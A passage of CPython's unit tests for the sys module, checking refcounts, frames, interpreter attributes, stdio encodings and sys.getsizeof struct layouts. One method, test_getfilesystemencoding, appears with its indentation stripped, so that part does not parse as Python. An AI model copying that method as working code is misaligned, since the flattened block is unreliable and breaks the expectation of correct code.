    def test_refcount(self):
        """Binding/unbinding a global changes sys.getrefcount(None) by one."""
        # n here must be a global in order for this test to pass while
        # tracing with a python function. Tracing calls PyFrame_FastToLocals
        # which will add a copy of any locals to the frame object, causing
        # the reference count to increase by 2 instead of 1.
        global n
        self.assertRaises(TypeError, sys.getrefcount)
        c = sys.getrefcount(None)
        n = None
        self.assertEqual(sys.getrefcount(None), c+1)
        del n
        self.assertEqual(sys.getrefcount(None), c)
        # gettotalrefcount() only exists in debug builds.
        if hasattr(sys, "gettotalrefcount"):
            self.assertIsInstance(sys.gettotalrefcount(), int)
    def test_getframe(self):
        """sys._getframe() validates arguments and returns the current frame."""
        self.assertRaises(TypeError, sys._getframe, 42, 42)
        self.assertRaises(ValueError, sys._getframe, 2000000000)
        # The zero-depth frame must be this very test method.
        self.assertTrue(
            SysModuleTest.test_getframe.__code__ \
            is sys._getframe().f_code
        )
    # sys._current_frames() is a CPython-only gimmick.
    @test.support.impl_detail("current_frames")
    def test_current_frames(self):
        """Dispatch to the threaded or unthreaded _current_frames check."""
        have_threads = True
        try:
            import _thread
        except ImportError:
            have_threads = False
        if have_threads:
            self.current_frames_with_threads()
        else:
            self.current_frames_without_threads()
    # Test sys._current_frames() in a WITH_THREADS build.
    @test.support.reap_threads
    def current_frames_with_threads(self):
        """Verify sys._current_frames() maps thread ids to sensible frames."""
        import threading
        import traceback
        # Spawn a thread that blocks at a known place. Then the main
        # thread does sys._current_frames(), and verifies that the frames
        # returned make sense.
        entered_g = threading.Event()
        leave_g = threading.Event()
        thread_info = []  # the thread's id
        def f123():
            g456()
        def g456():
            thread_info.append(threading.get_ident())
            entered_g.set()
            leave_g.wait()
        t = threading.Thread(target=f123)
        t.start()
        entered_g.wait()
        # At this point, t has finished its entered_g.set(), although it's
        # impossible to guess whether it's still on that line or has moved on
        # to its leave_g.wait().
        self.assertEqual(len(thread_info), 1)
        thread_id = thread_info[0]
        d = sys._current_frames()
        main_id = threading.get_ident()
        self.assertIn(main_id, d)
        self.assertIn(thread_id, d)
        # Verify that the captured main-thread frame is _this_ frame.
        frame = d.pop(main_id)
        self.assertTrue(frame is sys._getframe())
        # Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
        # threading.py are also in the thread's call stack.
        frame = d.pop(thread_id)
        stack = traceback.extract_stack(frame)
        for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
            if funcname == "f123":
                break
        else:
            self.fail("didn't find f123() on thread's call stack")
        self.assertEqual(sourceline, "g456()")
        # And the next record must be for g456().
        filename, lineno, funcname, sourceline = stack[i+1]
        self.assertEqual(funcname, "g456")
        # The thread may still be between entered_g.set() and leave_g.wait().
        self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
        # Reap the spawned thread.
        leave_g.set()
        t.join()
    # Test sys._current_frames() when thread support doesn't exist.
    def current_frames_without_threads(self):
        """Without threads there is exactly one entry, keyed by id 0."""
        # Not much happens here: there is only one thread, with artificial
        # "thread id" 0.
        d = sys._current_frames()
        self.assertEqual(len(d), 1)
        self.assertIn(0, d)
        self.assertTrue(d[0] is sys._getframe())
    def test_attributes(self):
        """Sanity-check the types and invariants of sys' data attributes."""
        self.assertIsInstance(sys.api_version, int)
        self.assertIsInstance(sys.argv, list)
        self.assertIn(sys.byteorder, ("little", "big"))
        self.assertIsInstance(sys.builtin_module_names, tuple)
        self.assertIsInstance(sys.copyright, str)
        self.assertIsInstance(sys.exec_prefix, str)
        self.assertIsInstance(sys.base_exec_prefix, str)
        self.assertIsInstance(sys.executable, str)
        self.assertEqual(len(sys.float_info), 11)
        self.assertEqual(sys.float_info.radix, 2)
        self.assertEqual(len(sys.int_info), 2)
        if test.support.check_impl_detail(cpython=True):
            # CPython stores ints in 15- or 30-bit digits.
            self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
        else:
            self.assertTrue(sys.int_info.bits_per_digit >= 1)
        self.assertTrue(sys.int_info.sizeof_digit >= 1)
        self.assertEqual(type(sys.int_info.bits_per_digit), int)
        self.assertEqual(type(sys.int_info.sizeof_digit), int)
        self.assertIsInstance(sys.hexversion, int)
        if test.support.check_impl_detail(cpython=True):
            self.assertEqual(len(sys.hash_info), 9)
            self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
            # sys.hash_info.modulus should be a prime; we do a quick
            # probable primality test (doesn't exclude the possibility of
            # a Carmichael number)
            for x in range(1, 100):
                self.assertEqual(
                    pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
                    1,
                    "sys.hash_info.modulus {} is a non-prime".format(
                        sys.hash_info.modulus)
                )
        self.assertIsInstance(sys.hash_info.inf, int)
        self.assertIsInstance(sys.hash_info.nan, int)
        self.assertIsInstance(sys.hash_info.imag, int)
        if test.support.check_impl_detail(cpython=True):
            # Cross-check the runtime's reported hash algorithm against the
            # compile-time configuration variable.
            algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
            if sys.hash_info.algorithm in {"fnv", "siphash24"}:
                self.assertIn(sys.hash_info.hash_bits, {32, 64})
                self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
                if algo == 1:
                    self.assertEqual(sys.hash_info.algorithm, "siphash24")
                elif algo == 2:
                    self.assertEqual(sys.hash_info.algorithm, "fnv")
                else:
                    self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
            else:
                # PY_HASH_EXTERNAL
                self.assertEqual(algo, 0)
            self.assertGreaterEqual(sys.hash_info.cutoff, 0)
            self.assertLess(sys.hash_info.cutoff, 8)
        self.assertIsInstance(sys.maxsize, int)
        self.assertIsInstance(sys.maxunicode, int)
        self.assertEqual(sys.maxunicode, 0x10FFFF)
        self.assertIsInstance(sys.platform, str)
        self.assertIsInstance(sys.prefix, str)
        self.assertIsInstance(sys.base_prefix, str)
        self.assertIsInstance(sys.version, str)
        # version_info is a 5-tuple with named fields; indexed and named
        # access must agree.
        vi = sys.version_info
        self.assertIsInstance(vi[:], tuple)
        self.assertEqual(len(vi), 5)
        self.assertIsInstance(vi[0], int)
        self.assertIsInstance(vi[1], int)
        self.assertIsInstance(vi[2], int)
        self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
        self.assertIsInstance(vi[4], int)
        self.assertIsInstance(vi.major, int)
        self.assertIsInstance(vi.minor, int)
        self.assertIsInstance(vi.micro, int)
        self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
        self.assertIsInstance(vi.serial, int)
        self.assertEqual(vi[0], vi.major)
        self.assertEqual(vi[1], vi.minor)
        self.assertEqual(vi[2], vi.micro)
        self.assertEqual(vi[3], vi.releaselevel)
        self.assertEqual(vi[4], vi.serial)
        self.assertTrue(vi > (1,0,0))
        self.assertIsInstance(sys.float_repr_style, str)
        self.assertIn(sys.float_repr_style, ('short', 'legacy'))
        if not sys.platform.startswith('win'):
            # abiflags only exists on POSIX builds.
            self.assertIsInstance(sys.abiflags, str)
    @unittest.skipUnless(hasattr(sys, 'thread_info'),
                         'Threading required for this test.')
    def test_thread_info(self):
        """sys.thread_info is a 3-tuple with known name/lock values."""
        info = sys.thread_info
        self.assertEqual(len(info), 3)
        self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
        self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
    def test_43581(self):
        """Regression test: __stdout__ and __stderr__ share one encoding."""
        # Can't use sys.stdout, as this is a StringIO object when
        # the test runs under regrtest.
        self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
    def test_intern(self):
        """sys.intern() returns the canonical object and rejects str subclasses."""
        # numruns makes each run's sample string unique, so a string can
        # never already be interned from a previous invocation.
        global numruns
        numruns += 1
        self.assertRaises(TypeError, sys.intern)
        s = "never interned before" + str(numruns)
        self.assertTrue(sys.intern(s) is s)
        # An equal but distinct string must intern to the same object.
        s2 = s.swapcase().swapcase()
        self.assertTrue(sys.intern(s2) is s)
        # Subclasses of string can't be interned, because they
        # provide too much opportunity for insane things to happen.
        # We don't want them in the interned dict and if they aren't
        # actually interned, we don't want to create the appearance
        # that they are by allowing intern() to succeed.
        class S(str):
            def __hash__(self):
                return 123
        self.assertRaises(TypeError, sys.intern, S("abc"))
    def test_sys_flags(self):
        """Every documented sys.flags field exists and is an int."""
        self.assertTrue(sys.flags)
        attrs = ("debug",
                 "inspect", "interactive", "optimize", "dont_write_bytecode",
                 "no_user_site", "no_site", "ignore_environment", "verbose",
                 "bytes_warning", "quiet", "hash_randomization", "isolated")
        for attr in attrs:
            self.assertTrue(hasattr(sys.flags, attr), attr)
            self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
        self.assertTrue(repr(sys.flags))
        # No extra, undocumented fields either.
        self.assertEqual(len(sys.flags), len(attrs))
    def assert_raise_on_new_sys_type(self, sys_attr):
        """Assert that the type of *sys_attr* cannot be instantiated.

        Both normal construction and the __new__ backdoor must fail.
        """
        # Users are intentionally prevented from creating new instances of
        # sys.flags, sys.version_info, and sys.getwindowsversion.
        attr_type = type(sys_attr)
        with self.assertRaises(TypeError):
            attr_type()
        with self.assertRaises(TypeError):
            attr_type.__new__(attr_type)
    def test_sys_flags_no_instantiation(self):
        """The sys.flags struct-sequence type is not instantiable."""
        self.assert_raise_on_new_sys_type(sys.flags)
    def test_sys_version_info_no_instantiation(self):
        """The sys.version_info struct-sequence type is not instantiable."""
        self.assert_raise_on_new_sys_type(sys.version_info)
    def test_sys_getwindowsversion_no_instantiation(self):
        """The getwindowsversion() result type is not instantiable."""
        # Skip if not being run on Windows.
        test.support.get_attribute(sys, "getwindowsversion")
        self.assert_raise_on_new_sys_type(sys.getwindowsversion())
    @test.support.cpython_only
    def test_clear_type_cache(self):
        """Smoke test: sys._clear_type_cache() is callable without error."""
        sys._clear_type_cache()
    def test_ioencoding(self):
        """PYTHONIOENCODING controls stdio encoding and error handler."""
        env = dict(os.environ)
        # Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
        # not representable in ASCII.
        env["PYTHONIOENCODING"] = "cp424"
        p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                             stdout = subprocess.PIPE, env=env)
        out = p.communicate()[0].strip()
        expected = ("\xa2" + os.linesep).encode("cp424")
        self.assertEqual(out, expected)
        # "encoding:errors" form: unencodable chars get replaced.
        env["PYTHONIOENCODING"] = "ascii:replace"
        p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                             stdout = subprocess.PIPE, env=env)
        out = p.communicate()[0].strip()
        self.assertEqual(out, b'?')
        # Plain "ascii" uses strict errors, so printing U+00A2 must fail.
        env["PYTHONIOENCODING"] = "ascii"
        p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             env=env)
        out, err = p.communicate()
        self.assertEqual(out, b'')
        self.assertIn(b'UnicodeEncodeError:', err)
        self.assertIn(rb"'\xa2'", err)
        # A trailing colon with no handler behaves like strict as well.
        env["PYTHONIOENCODING"] = "ascii:"
        p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             env=env)
        out, err = p.communicate()
        self.assertEqual(out, b'')
        self.assertIn(b'UnicodeEncodeError:', err)
        self.assertIn(rb"'\xa2'", err)
        # Handler-only form keeps the default encoding but swaps the handler.
        env["PYTHONIOENCODING"] = ":surrogateescape"
        p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
                             stdout=subprocess.PIPE, env=env)
        out = p.communicate()[0].strip()
        self.assertEqual(out, b'\xbd')
    @unittest.skipUnless(test.support.FS_NONASCII,
                         'requires OS support of non-ASCII encodings')
    def test_ioencoding_nonascii(self):
        """An empty PYTHONIOENCODING falls back to the filesystem encoding."""
        env = dict(os.environ)
        env["PYTHONIOENCODING"] = ""
        p = subprocess.Popen([sys.executable, "-c",
                              'print(%a)' % test.support.FS_NONASCII],
                             stdout=subprocess.PIPE, env=env)
        out = p.communicate()[0].strip()
        self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
    @unittest.skipIf(sys.base_prefix != sys.prefix,
                     'Test is not venv-compatible')
    def test_executable(self):
        """sys.executable is absolute, or empty when argv[0] is bogus."""
        # sys.executable should be absolute
        self.assertEqual(os.path.abspath(sys.executable), sys.executable)
        # Issue #7774: Ensure that sys.executable is an empty string if argv[0]
        # has been set to a non existent program name and Python is unable to
        # retrieve the real program name
        # For a normal installation, it should work without 'cwd'
        # argument. For test runs in the build directory, see #7774.
        python_dir = os.path.dirname(os.path.realpath(sys.executable))
        p = subprocess.Popen(
            ["nonexistent", "-c",
             'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
            executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
        stdout = p.communicate()[0]
        executable = stdout.strip().decode("ASCII")
        p.wait()
        # Either the child could not determine its executable (b'') or it
        # resolved the same path the parent uses.
        self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
    def check_fsencoding(self, fs_encoding, expected=None):
        """Assert *fs_encoding* names a real codec and, if given, equals *expected*.

        codecs.lookup() raises LookupError for an unknown codec name, which
        fails the test.
        """
        self.assertIsNotNone(fs_encoding)
        codecs.lookup(fs_encoding)
        if expected:
            self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
elif sys.platform == 'win32':
expected = 'mbcs'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
    def c_locale_get_error_handler(self, isolated=False, encoding=None):
        """Run a child under LC_ALL=C and report its stdio error handlers.

        Returns the child's stdout: one "name: errors" line each for stdin,
        stdout and stderr.
        """
        # Force the POSIX locale
        env = os.environ.copy()
        env["LC_ALL"] = "C"
        code = '\n'.join((
            'import sys',
            'def dump(name):',
            '    std = getattr(sys, name)',
            '    print("%s: %s" % (name, std.errors))',
            'dump("stdin")',
            'dump("stdout")',
            'dump("stderr")',
        ))
        args = [sys.executable, "-c", code]
        if isolated:
            args.append("-I")
        # Either force a PYTHONIOENCODING value or make sure it is unset.
        if encoding is not None:
            env['PYTHONIOENCODING'] = encoding
        else:
            env.pop('PYTHONIOENCODING', None)
        p = subprocess.Popen(args,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT,
                             env=env,
                             universal_newlines=True)
        stdout, stderr = p.communicate()
        return stdout
    def test_c_locale_surrogateescape(self):
        """Under the C locale, stdio defaults to surrogateescape handlers."""
        out = self.c_locale_get_error_handler(isolated=True)
        self.assertEqual(out,
                         'stdin: surrogateescape\n'
                         'stdout: surrogateescape\n'
                         'stderr: backslashreplace\n')
        # replace the default error handler
        out = self.c_locale_get_error_handler(encoding=':ignore')
        self.assertEqual(out,
                         'stdin: ignore\n'
                         'stdout: ignore\n'
                         'stderr: backslashreplace\n')
        # force the encoding
        out = self.c_locale_get_error_handler(encoding='iso8859-1')
        self.assertEqual(out,
                         'stdin: strict\n'
                         'stdout: strict\n'
                         'stderr: backslashreplace\n')
        out = self.c_locale_get_error_handler(encoding='iso8859-1:')
        self.assertEqual(out,
                         'stdin: strict\n'
                         'stdout: strict\n'
                         'stderr: backslashreplace\n')
        # has no effect
        out = self.c_locale_get_error_handler(encoding=':')
        self.assertEqual(out,
                         'stdin: surrogateescape\n'
                         'stdout: surrogateescape\n'
                         'stderr: backslashreplace\n')
        out = self.c_locale_get_error_handler(encoding='')
        self.assertEqual(out,
                         'stdin: surrogateescape\n'
                         'stdout: surrogateescape\n'
                         'stderr: backslashreplace\n')
    def test_implementation(self):
        """sys.implementation satisfies the PEP 421 contract."""
        # This test applies to all implementations equally.
        levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
        self.assertTrue(hasattr(sys.implementation, 'name'))
        self.assertTrue(hasattr(sys.implementation, 'version'))
        self.assertTrue(hasattr(sys.implementation, 'hexversion'))
        self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
        version = sys.implementation.version
        self.assertEqual(version[:2], (version.major, version.minor))
        # hexversion packs the version fields the same way PY_VERSION_HEX does.
        hexversion = (version.major << 24 | version.minor << 16 |
                      version.micro << 8 | levels[version.releaselevel] << 4 |
                      version.serial << 0)
        self.assertEqual(sys.implementation.hexversion, hexversion)
        # PEP 421 requires that .name be lower case.
        self.assertEqual(sys.implementation.name,
                         sys.implementation.name.lower())
    @test.support.cpython_only
    def test_debugmallocstats(self):
        """sys._debugmallocstats() writes stats to stderr and takes no args."""
        # Test sys._debugmallocstats()
        from test.support.script_helper import assert_python_ok
        args = ['-c', 'import sys; sys._debugmallocstats()']
        ret, out, err = assert_python_ok(*args)
        self.assertIn(b"free PyDictObjects", err)
        # The function has no parameter
        self.assertRaises(TypeError, sys._debugmallocstats, True)
    @unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
                         "sys.getallocatedblocks unavailable on this build")
    def test_getallocatedblocks(self):
        """sys.getallocatedblocks() returns a plausible, gc-sensitive count."""
        # Some sanity checks
        with_pymalloc = sysconfig.get_config_var('WITH_PYMALLOC')
        a = sys.getallocatedblocks()
        self.assertIs(type(a), int)
        if with_pymalloc:
            self.assertGreater(a, 0)
        else:
            # When WITH_PYMALLOC isn't available, we don't know anything
            # about the underlying implementation: the function might
            # return 0 or something greater.
            self.assertGreaterEqual(a, 0)
        try:
            # While we could imagine a Python session where the number of
            # multiple buffer objects would exceed the sharing of references,
            # it is unlikely to happen in a normal test run.
            self.assertLess(a, sys.gettotalrefcount())
        except AttributeError:
            # gettotalrefcount() not available
            pass
        # Collecting garbage can only free blocks, never create them.
        gc.collect()
        b = sys.getallocatedblocks()
        self.assertLessEqual(b, a)
        # A second collection should leave the count roughly stable.
        gc.collect()
        c = sys.getallocatedblocks()
        self.assertIn(c, range(b - 50, b + 50))
    @test.support.requires_type_collecting
    def test_is_finalizing(self):
        """sys.is_finalizing() is False normally, True during shutdown."""
        self.assertIs(sys.is_finalizing(), False)
        # Don't use the atexit module because _Py_Finalizing is only set
        # after calling atexit callbacks
        code = """if 1:
            import sys
            class AtExit:
                is_finalizing = sys.is_finalizing
                print = print
                def __del__(self):
                    self.print(self.is_finalizing(), flush=True)
            # Keep a reference in the __main__ module namespace, so the
            # AtExit destructor will be called at Python exit
            ref = AtExit()
        """
        rc, stdout, stderr = assert_python_ok('-c', code)
        if test.support.check_impl_detail(cpython=True):
            self.assertEqual(stdout.rstrip(), b'True')
        else:
            # the __del__ method may or may not have been called
            # in other Python implementations
            self.assertIn(stdout.rstrip(), {b'True', b''})
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
    """Verify sys.getsizeof() against the C struct layouts of built-in types.

    The struct-format strings passed to calcobjsize/calcvobjsize mirror the
    field layouts in CPython's Objects/ and Python/ sources; they are
    version-specific by design.
    """

    def setUp(self):
        # Platform pointer size and int digit size, used throughout.
        self.P = struct.calcsize('P')
        self.longdigit = sys.int_info.sizeof_digit
        import _testcapi
        self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD

    # Shared helper: check_sizeof(obj, expected) asserts getsizeof(obj).
    check_sizeof = test.support.check_sizeof

    def test_gc_head_size(self):
        """GC-tracked objects report the GC header in their size."""
        # Check that the gc header size is added to objects tracked by the gc.
        vsize = test.support.calcvobjsize
        gc_header_size = self.gc_headsize
        # bool objects are not gc tracked
        self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
        # but lists are
        self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)

    def test_errors(self):
        """getsizeof() propagates / converts bad __sizeof__ results."""
        class BadSizeof:
            def __sizeof__(self):
                raise ValueError
        self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
        class InvalidSizeof:
            def __sizeof__(self):
                return None
        self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
        # The default is returned untouched when __sizeof__ is unusable.
        sentinel = ["sentinel"]
        self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
        class FloatSizeof:
            def __sizeof__(self):
                return 4.5
        self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
        self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
        class OverflowSizeof(int):
            def __sizeof__(self):
                return int(self)
        self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
                         sys.maxsize + self.gc_headsize)
        with self.assertRaises(OverflowError):
            sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
        with self.assertRaises(ValueError):
            sys.getsizeof(OverflowSizeof(-1))
        with self.assertRaises((ValueError, OverflowError)):
            sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))

    def test_default(self):
        """The default argument is ignored when __sizeof__ works."""
        size = test.support.calcvobjsize
        self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
        self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)

    def test_objecttypes(self):
        """Check the size of every type defined in Objects/."""
        # check all types defined in Objects/
        calcsize = struct.calcsize
        size = test.support.calcobjsize
        vsize = test.support.calcvobjsize
        check = self.check_sizeof
        # bool
        check(True, vsize('') + self.longdigit)
        # buffer
        # XXX
        # builtin_function_or_method
        check(len, size('4P'))  # XXX check layout
        # bytearray
        samples = [b'', b'u'*100000]
        for sample in samples:
            x = bytearray(sample)
            check(x, vsize('n2Pi') + x.__alloc__())
        # bytearray_iterator
        check(iter(bytearray()), size('nP'))
        # bytes
        check(b'', vsize('n') + 1)
        check(b'x' * 10, vsize('n') + 11)
        # cell
        def get_cell():
            x = 42
            def inner():
                return x
            return inner
        check(get_cell().__closure__[0], size('P'))
        # code
        check(get_cell().__code__, size('5i9Pi3P'))
        check(get_cell.__code__, size('5i9Pi3P'))
        def get_cell2(x):
            def inner():
                return x
            return inner
        check(get_cell2.__code__, size('5i9Pi3P') + 1)
        # complex
        check(complex(0,1), size('2d'))
        # method_descriptor (descriptor object)
        check(str.lower, size('3PP'))
        # classmethod_descriptor (descriptor object)
        # XXX
        # member_descriptor (descriptor object)
        import datetime
        check(datetime.timedelta.days, size('3PP'))
        # getset_descriptor (descriptor object)
        import collections
        check(collections.defaultdict.default_factory, size('3PP'))
        # wrapper_descriptor (descriptor object)
        check(int.__add__, size('3P2P'))
        # method-wrapper (descriptor object)
        check({}.__iter__, size('2P'))
        # dict
        check({}, size('n2P') + calcsize('2nPn') + 8*calcsize('n2P'))
        longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
        check(longdict, size('n2P') + calcsize('2nPn') + 16*calcsize('n2P'))
        # dictionary-keyview
        check({}.keys(), size('P'))
        # dictionary-valueview
        check({}.values(), size('P'))
        # dictionary-itemview
        check({}.items(), size('P'))
        # dictionary iterator
        check(iter({}), size('P2nPn'))
        # dictionary-keyiterator
        check(iter({}.keys()), size('P2nPn'))
        # dictionary-valueiterator
        check(iter({}.values()), size('P2nPn'))
        # dictionary-itemiterator
        check(iter({}.items()), size('P2nPn'))
        # dictproxy
        class C(object): pass
        check(C.__dict__, size('P'))
        # BaseException
        check(BaseException(), size('5Pb'))
        # UnicodeEncodeError
        check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
        # UnicodeDecodeError
        check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
        # UnicodeTranslateError
        check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
        # ellipses
        check(Ellipsis, size(''))
        # EncodingMap
        import codecs, encodings.iso8859_3
        x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
        check(x, size('32B2iB'))
        # enumerate
        check(enumerate([]), size('n3P'))
        # reverse
        check(reversed(''), size('nP'))
        # float
        check(float(0), size('d'))
        # sys.floatinfo
        check(sys.float_info, vsize('') + self.P * len(sys.float_info))
        # frame
        import inspect
        CO_MAXBLOCKS = 20
        x = inspect.currentframe()
        # A frame's size depends on the code object's stack/local/cell counts.
        ncells = len(x.f_code.co_cellvars)
        nfrees = len(x.f_code.co_freevars)
        extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
                 ncells + nfrees - 1
        check(x, vsize('12P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
        # function
        def func(): pass
        check(func, size('12P'))
        class c():
            @staticmethod
            def foo():
                pass
            @classmethod
            def bar(cls):
                pass
            # NOTE: these checks run inside the class body, where foo/bar
            # are still the raw staticmethod/classmethod descriptor objects.
            # staticmethod
            check(foo, size('PP'))
            # classmethod
            check(bar, size('PP'))
        # generator
        def get_gen(): yield 1
        check(get_gen(), size('Pb2PPP'))
        # iterator
        check(iter('abc'), size('lP'))
        # callable-iterator
        import re
        check(re.finditer('',''), size('2P'))
        # list
        samples = [[], [1,2,3], ['1', '2', '3']]
        for sample in samples:
            check(sample, vsize('Pn') + len(sample)*self.P)
        # sortwrapper (list)
        # XXX
        # cmpwrapper (list)
        # XXX
        # listiterator (list)
        check(iter([]), size('lP'))
        # listreverseiterator (list)
        check(reversed([]), size('nP'))
        # int
        check(0, vsize(''))
        check(1, vsize('') + self.longdigit)
        check(-1, vsize('') + self.longdigit)
        PyLong_BASE = 2**sys.int_info.bits_per_digit
        check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
        check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
        check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
        # module
        check(unittest, size('PnPPP'))
        # None
        check(None, size(''))
        # NotImplementedType
        check(NotImplemented, size(''))
        # object
        check(object(), size(''))
        # property (descriptor object)
        class C(object):
            def getx(self): return self.__x
            def setx(self, value): self.__x = value
            def delx(self): del self.__x
            x = property(getx, setx, delx, "")
            check(x, size('4Pi'))
        # PyCapsule
        # XXX
        # rangeiterator
        check(iter(range(1)), size('4l'))
        # reverse
        check(reversed(''), size('nP'))
        # range
        check(range(1), size('4P'))
        check(range(66000), size('4P'))
        # set
        # frozenset
        PySet_MINSIZE = 8
        samples = [[], range(10), range(50)]
        s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
        for sample in samples:
            minused = len(sample)
            # NOTE(review): 'tmp' is assigned but never used — looks like
            # dead code left over from an earlier version.
            if minused == 0: tmp = 1
            # the computation of minused is actually a bit more complicated
            # but this suffices for the sizeof test
            minused = minused*2
            newsize = PySet_MINSIZE
            while newsize <= minused:
                newsize = newsize << 1
            if newsize <= 8:
                # Small sets use the inline small table; no extra allocation.
                check(set(sample), s)
                check(frozenset(sample), s)
            else:
                check(set(sample), s + newsize*calcsize('nP'))
                check(frozenset(sample), s + newsize*calcsize('nP'))
        # setiterator
        check(iter(set()), size('P3n'))
        # slice
        check(slice(0), size('3P'))
        # super
        check(super(int), size('3P'))
        # tuple
        check((), vsize(''))
        check((1,2,3), vsize('') + 3*self.P)
        # type
        # static type: PyTypeObject
        fmt = 'P2n15Pl4Pn9Pn11PIP'
        if hasattr(sys, 'getcounts'):
            fmt += '3n2P'
        s = vsize(fmt)
        check(int, s)
        # Heap types additionally embed all the method-suite structs.
        s = vsize(fmt +                 # PyTypeObject
                  '3P'                  # PyAsyncMethods
                  '36P'                 # PyNumberMethods
                  '3P'                  # PyMappingMethods
                  '10P'                 # PySequenceMethods
                  '2P'                  # PyBufferProcs
                  '4P')
        # Separate block for PyDictKeysObject with 4 entries
        s += calcsize("2nPn") + 4*calcsize("n2P")
        # class
        class newstyleclass(object): pass
        check(newstyleclass, s)
        # dict with shared keys
        check(newstyleclass().__dict__, size('n2P' + '2nPn'))
        # unicode
        # each tuple contains a string and its expected character size
        # don't put any static strings here, as they may contain
        # wchar_t or UTF-8 representations
        samples = ['1'*100, '\xff'*50,
                   '\u0100'*40, '\uffff'*100,
                   '\U00010000'*30, '\U0010ffff'*100]
        asciifields = "nnbP"
        compactfields = asciifields + "nPn"
        unicodefields = compactfields + "P"
        for s in samples:
            # The storage width depends on the widest character (PEP 393).
            maxchar = ord(max(s))
            if maxchar < 128:
                L = size(asciifields) + len(s) + 1
            elif maxchar < 256:
                L = size(compactfields) + len(s) + 1
            elif maxchar < 65536:
                L = size(compactfields) + 2*(len(s) + 1)
            else:
                L = size(compactfields) + 4*(len(s) + 1)
            check(s, L)
        # verify that the UTF-8 size is accounted for
        s = chr(0x4000)   # 4 bytes canonical representation
        check(s, size(compactfields) + 4)
        # compile() will trigger the generation of the UTF-8
        # representation as a side effect
        compile(s, "<stdin>", "eval")
        check(s, size(compactfields) + 4 + 4)
        # TODO: add check that forces the presence of wchar_t representation
        # TODO: add check that forces layout of unicodefields
        # weakref
        import weakref
        check(weakref.ref(int), size('2Pn2P'))
        # weakproxy
        # XXX
        # weakcallableproxy
        check(weakref.proxy(int), size('2Pn2P'))

    def check_slots(self, obj, base, extra):
        """Assert obj is *extra* struct bytes bigger than *base* (plus GC head)."""
        expected = sys.getsizeof(base) + struct.calcsize(extra)
        if gc.is_tracked(obj) and not gc.is_tracked(base):
            expected += self.gc_headsize
        self.assertEqual(sys.getsizeof(obj), expected)

    def test_slots(self):
        """__slots__ add exactly one pointer per slot to the base type size."""
        # check all subclassable types defined in Objects/ that allow
        # non-empty __slots__
        check = self.check_slots
        class BA(bytearray):
            __slots__ = 'a', 'b', 'c'
        check(BA(), bytearray(), '3P')
        class D(dict):
            __slots__ = 'a', 'b', 'c'
        check(D(x=[]), {'x': []}, '3P')
        class L(list):
            __slots__ = 'a', 'b', 'c'
        check(L(), [], '3P')
        class S(set):
            __slots__ = 'a', 'b', 'c'
        check(S(), set(), '3P')
        class FS(frozenset):
            __slots__ = 'a', 'b', 'c'
        check(FS(), frozenset(), '3P')
        from collections import OrderedDict
        class OD(OrderedDict):
            __slots__ = 'a', 'b', 'c'
        check(OD(x=[]), OrderedDict(x=[]), '3P')

    def test_pythontypes(self):
        """Check the size of types defined in Python/."""
